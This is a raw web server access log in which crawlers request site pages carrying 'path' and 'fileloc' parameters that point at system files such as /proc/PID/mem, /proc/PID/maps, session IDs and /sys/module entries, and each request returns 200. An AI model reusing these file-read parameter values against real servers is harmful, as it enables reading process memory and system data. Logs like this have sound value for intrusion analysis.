44.212.131.50 - - [10/Nov/2025:01:03:54 +0000] "GET /our-works/tvc-lapatie-2/?path=//lib/python3.8/venv/__pycache__ HTTP/1.1" 200 3025 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:03:54 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/sessionid&path=//proc/664 HTTP/1.1" 200 2618 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:55 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/maps&path=//proc/689 HTTP/1.1" 200 2604 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:55 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/wchan&path=//proc/659 HTTP/1.1" 200 2607 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:57 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/sessionid&path=//proc/664 HTTP/1.1" 200 2618 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:57 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/mem&path=//proc/689 HTTP/1.1" 200 2604 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
52.202.52.82 - - [10/Nov/2025:01:03:58 +0000] "GET /our-works/tvc-kimino/?fileloc=//sys/module/input_leds/initstate&path=//sys/module/input_leds HTTP/1.1" 200 2625 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:01:03:58 +0000] "GET /49zpt20845.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
